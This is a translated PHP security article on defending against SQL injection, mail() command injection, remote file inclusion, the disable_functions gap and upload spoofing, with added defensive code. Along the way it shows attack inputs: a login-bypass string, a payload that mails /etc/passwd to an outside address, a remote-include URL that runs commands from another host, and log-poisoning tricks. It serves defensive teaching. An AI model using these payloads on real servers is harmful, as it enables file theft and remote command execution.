Shaun Clowes's article Exploiting Common Vulnerabilities in PHP Applications is indeed well written and considers many aspects. This article is only a modest supplement to it, adding a few other problems that it does not mention. The focus here is on solving the problems rather than on the attacks.
1. The old SQL statement spoofing trick
In the default configuration, even if you forget to copy php.ini to /usr/local/lib/php.ini, PHP still runs with magic_quotes_gpc = on. In this mode the single quote ('), double quote ("), backslash (\) and null character NUL (the null byte) in every variable coming from GET/POST/Cookie are prefixed with a backslash, so that the database can be queried correctly. However, php-4-RC2 introduced a configuration file php.ini-optimized, and in that optimized php.ini magic_quotes_gpc = off. Some administrators may copy php.ini-optimized to /usr/local/lib/php.ini, which is dangerous. A fairly simple example is a login check, assuming the necessary characters are not filtered:
select * from login where user='$HTTP_POST_VARS[user]' and pass='$HTTP_POST_VARS[pass]'
If we enter 1' or 1='1 in both the user box and the password box, we pass the check. This is a very old method; the statement becomes:
select * from login where user='1' or 1='1' and pass='1' or 1='1'
Because or 1='1' is always true, the check passes. The best solution is to filter out all characters that are not needed, and we recommend passing every variable that comes from GET/POST/Cookie and is used in SQL through a custom function:
function gpc2sql($str) {
    // With magic_quotes_gpc on, PHP has already escaped ' " \ and NUL in GET/POST/Cookie data
    if (get_magic_quotes_gpc() == 1)
        return $str;
    else
        return addslashes($str);
}
Its main purpose is to let your program be ported safely to systems with either setting of magic_quotes_gpc.
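The following is an added example, not code from the original article, showing gpc2sql() applied to the login query from this section. The table name, column names and the constructed POST values are assumptions for illustration; the example targets the PHP 4 era this article describes, since get_magic_quotes_gpc() no longer exists in current PHP.

```php
<?php
// Added example (not from the original article): escaping GET/POST data with
// gpc2sql() before it is interpolated into the login query from section 1.

function gpc2sql($str) {
    // With magic_quotes_gpc on, PHP already escaped ' " \ and NUL
    if (get_magic_quotes_gpc() == 1)
        return $str;
    else
        return addslashes($str);
}

function login_query($user, $pass) {
    // Every value that reaches SQL goes through gpc2sql() first
    $user = gpc2sql($user);
    $pass = gpc2sql($pass);
    return "select * from login where user='$user' and pass='$pass'";
}

// Constructed input: the 1' or 1='1 payload in both fields, standing in for
// raw POST data on a server with magic_quotes_gpc = off (with it on, PHP
// would already have escaped these and gpc2sql() passes them through)
$HTTP_POST_VARS = array('user' => "1' or 1='1", 'pass' => "1' or 1='1");

echo login_query($HTTP_POST_VARS['user'], $HTTP_POST_VARS['pass']), "\n";
// With magic_quotes_gpc off the output is
//   select * from login where user='1\' or 1=\'1' and pass='1\' or 1=\'1'
// so the or-clause stays inside the string literal instead of ending it,
// and no row matches unless a user is literally named 1' or 1='1.
?>
```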
2. The fifth parameter of the mail function
In php-4.0.5 the mail function gained a fifth parameter for passing additional command line arguments to the program that actually sends the mail. There is no proper check for special SHELL characters in it, so it carries a serious command execution problem. Take the example from the manual:
mail("nobody@aol.com", "the subject", $message, "From: webmaster@$SERVER_NAME", "-fwebmaster@$SERVER_NAME");
This is problematic: if $SERVER_NAME = ; mail san@xfocus.org </etc/passwd, the machine's password file is sent to my mailbox.
Here I would like to remind you that the php manual contains several examples with security problems. Do not copy them into your programs; they only demonstrate the basic use of a function, and you should understand them rather than reuse them.
For the mail function we simply do not need the fifth parameter, and any value that does go into it must have characters such as ; filtered out. Alternatively, modify ext/standard/mail.c in the php source package: before the line if (extra_cmd != NULL) { add the following line:
extra_cmd = NULL;
Then recompile.
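As an added example that is not part of the original article, here is one way to set the envelope sender without letting shell characters reach the fifth parameter: the address is checked against a strict pattern first, and anything else is refused before mail() is called. safe_mail(), valid_address() and the sample addresses are this example's own choices.

```php
<?php
// Added example (not from the original article): a wrapper around mail()
// that only passes an envelope sender (-f) after validating it, so the
// ";" / redirect payload from section 2 never reaches the command line.

function valid_address($addr) {
    // Letters, digits and a few punctuation characters only: no space,
    // semicolon, quote, redirect or other shell metacharacter can pass.
    return preg_match('/^[A-Za-z0-9._+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$/', $addr) == 1;
}

function safe_mail($to, $subject, $message, $from) {
    if (!valid_address($to) || !valid_address($from)) {
        return false;   // refuse rather than try to clean the value
    }
    // Only the already-checked address is interpolated into the -f option
    return mail($to, $subject, $message, "From: $from", "-f$from");
}

// Constructed inputs: the first call is a normal send (its result depends
// on the local mailer); the second carries the payload from the article
// and is refused without mail() ever being called.
var_dump(safe_mail('nobody@example.com', 'the subject', 'hello', 'webmaster@example.com'));
var_dump(safe_mail('nobody@example.com', 'the subject', 'hello', 'webmaster@; mail san@xfocus.org </etc/passwd'));
?>
```

If the program does not need a custom envelope sender at all, the simplest fix remains the one given above: leave the fifth parameter out entirely.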
3. The require and include functions on UNIX
The require and include functions of the Windows version do not support including remote files over HTTP and FTP, while the UNIX version supports remote file inclusion by default. Require and include execute the included file as part of the program, no matter what extension it has.
When writing programs, many require or include calls are unavoidable for modularization and portability, and sometimes a variable is used as the parameter, such as include("$something"); if the user can control $something and it is not filtered, the result is miserable.
First, you can view any file the web user has read permission on. Assume the program is called http://victim/test.php; then the url http://victim/test.php?something=/etc/passwd shows the /etc/passwd file.
In addition, commands can be executed through the functions contained in a remote file. For example, I create a file test.php on www.xfocus.org with the following content: Then I can use the following url:
http://victim/test.php?something=http://www.xfocus.org/test.php?cmd=uname
to run any command.
phpMyAdmin also had this problem, and it could be used to view any file. However, before the include it first calls file_exists to check whether the file exists, and file_exists does not support remote files, so the method above cannot be used directly. Instead, Apache's logging can be used: request a url containing php code, so that the code lands in the Apache log, and then specify the log file as something to execute commands; but Apache logs are usually large and full of unrelated data. Another way is file upload for local command execution: an uploaded file gets a name such as php8Ta02I in the server's upload temporary directory, and because that file exists at that moment, file_exists passes and the script in the uploaded file is executed.
Therefore you must be careful with include and require, especially when the included file is specified through a parameter: the parameter must not be controllable by the user. You can also switch off remote file inclusion in the php configuration: up to php-4.0.3 this required building with --disable-url-fopen-wrapper, and later versions provide allow_url_fopen = off in php.ini.
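The following is an added example, not code from the original article, showing how a request parameter can select a module without ever becoming part of the included path: the parameter is looked up in a fixed table, so neither /etc/passwd nor a remote url can reach include(). The module names, the modules/ directory and the parameter name something are assumptions.

```php
<?php
// Added example (not from the original article): choosing the file to
// include through a whitelist instead of include("$something").
// Assumed layout: modules live under ./modules/ as news.php, login.php, help.php

$allowed_modules = array(
    'news'  => 'modules/news.php',
    'login' => 'modules/login.php',
    'help'  => 'modules/help.php',
);

function module_path($name, $allowed) {
    // Only a key that is literally in the table is accepted; values such as
    // "../../etc/passwd", "/etc/passwd" or "http://www.xfocus.org/test.php"
    // are never used as a path, not even after filtering.
    if (!is_string($name) || !isset($allowed[$name])) {
        return false;
    }
    return $allowed[$name];
}

$something = isset($HTTP_GET_VARS['something']) ? $HTTP_GET_VARS['something'] : 'news';
$file = module_path($something, $allowed_modules);

if ($file === false) {
    echo "unknown module\n";
} else {
    include($file);
}
?>
```

Combined with allow_url_fopen = off this removes both halves of the problem: the user cannot pick an arbitrary local file, and even a mistake elsewhere in the program cannot pull code from a remote host.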
4. disable_functions
php-4.0.1 introduced a php.ini option called disable_functions, which is useful for disabling certain functions. For example, if disable_functions = passthru,exec,system,popen is added to php.ini, executing any of these functions prompts that system() has been disabled for security reasons.
Alas, this still does not prevent system commands from being executed, because php borrows many perl features; for example, backticks (`) execute a command:
<?php
$output = `ls -al`;   // the backtick operator runs the command even though system() etc. are disabled
echo "$output";
?>
This can only be avoided by enabling safe_mode, but the hateful safe_mode has far too many restrictions and makes other things inconvenient.
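As an added example that is not part of the original article, here is a small audit script that reads the running php.ini and reports which of the command-execution functions from this section are still enabled. It also checks shell_exec, which the article does not list: in later PHP releases the manual documents that the backtick operator is disabled whenever shell_exec is disabled, so adding it closes the backtick gap without safe_mode on those versions. The function names and messages are this example's own.

```php
<?php
// Added example (not from the original article): checking whether
// disable_functions actually covers the command-execution functions
// discussed in section 4, including the backtick operator's shell_exec.

function disabled_functions_list() {
    // disable_functions is a comma-separated list; normalize it
    $raw  = ini_get('disable_functions');
    $list = array();
    foreach (explode(',', $raw) as $name) {
        $name = strtolower(trim($name));
        if ($name !== '') {
            $list[] = $name;
        }
    }
    return $list;
}

function audit_exec_functions() {
    $disabled = disabled_functions_list();
    // The functions the article lists, plus shell_exec (backticks)
    $wanted  = array('passthru', 'exec', 'system', 'popen', 'shell_exec');
    $missing = array();
    foreach ($wanted as $fn) {
        if (!in_array($fn, $disabled)) {
            $missing[] = $fn;
        }
    }
    return $missing;
}

$missing = audit_exec_functions();
if (count($missing) == 0) {
    echo "all command-execution functions are disabled\n";
} else {
    echo "still enabled: " . implode(', ', $missing) . "\n";
}
if (!ini_get('safe_mode')) {
    echo "safe_mode is off (the only remedy for backticks on php-4.0.x)\n";
}
?>
```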
5. File upload
The php file upload problem is covered in Shaun Clowes's article.
Fortunately, php-4.0.3 and later provide the is_uploaded_file and move_uploaded_file functions. On php-4.0.3 and above an upload program must therefore not use the copy function; use move_uploaded_file instead, which checks that the file really was uploaded. For php-4.0.2 and below we recommend adding the following function and calling it before copy:
function is_uploaded_file($filename) {
    // Locate the upload temporary directory, falling back to the system temp dir
    if (!$tmp_file = get_cfg_var('upload_tmp_dir')) {
        $tmp_file = dirname(tempnam('', ''));
    }
    $tmp_file .= '/' . basename($filename);
    /* User might have trailing slash in php.ini... */
    return (ereg_replace('/+', '/', $tmp_file) == $filename);
}
This vulnerability has been known on security focus for a long time, but most programs run many checks and validations before the copy, so the attack is rather difficult in practice.
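The following is an added example, not code from the original article, of an upload handler for php-4.0.3 and later that relies on is_uploaded_file() and move_uploaded_file() instead of copy(), so a forged $HTTP_POST_FILES entry pointing at /etc/passwd is rejected. The form field name userfile, the destination directory and the file name rule are assumptions.

```php
<?php
// Added example (not from the original article): storing an upload with
// move_uploaded_file() and checking the client-supplied name, for the
// file upload problem in section 5.
// Assumed form field: userfile; assumed destination: /var/www/uploads

$upload_dir = '/var/www/uploads';

function store_upload($file, $upload_dir) {
    // $file is one entry of $HTTP_POST_FILES, e.g. $HTTP_POST_FILES['userfile'].
    // A forged tmp_name such as /etc/passwd fails is_uploaded_file().
    if (!isset($file['tmp_name']) || !is_uploaded_file($file['tmp_name'])) {
        return 'not an uploaded file';
    }
    // Never trust the client name: strip any path and allow a conservative
    // character set only, so ../ tricks and hidden dot files are rejected.
    $name = basename($file['name']);
    if (!preg_match('/^[A-Za-z0-9_.-]{1,64}$/', $name) || $name[0] == '.') {
        return 'bad file name';
    }
    $dest = $upload_dir . '/' . $name;
    if (file_exists($dest)) {
        return 'file already exists';
    }
    // move_uploaded_file() repeats the uploaded-file check itself
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return 'could not move file';
    }
    return 'stored ' . $dest;
}

if (isset($HTTP_POST_FILES['userfile'])) {
    echo store_upload($HTTP_POST_FILES['userfile'], $upload_dir), "\n";
}
?>
```

Keeping the destination directory outside the document root, or at least not executable by the web server, also prevents an uploaded .php file from becoming the local include target described in section 3.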
Also, do not use environment variables, Cookie variables, session variables and the like as the conditions for deciding whether a link is allowed, because these variables are too easy to forge.
Haha, there are many more things at hand, and the rest will have to wait. Other comrades are welcome to add to and correct this.
References
1. PHP 4 ChangeLog (http://www.php.net/ChangeLog-4.php)
2. A Study In Scarlet - Exploiting Common Vulnerabilities in PHP Applications (http://www.securereality.com.au/studyinscarlet.txt) and analysist's translation.
3. Remote command execution vulnerabilities in phpMyAdmin and phpPgAdmin (http://www.securereality.com.au/sradv00008.txt)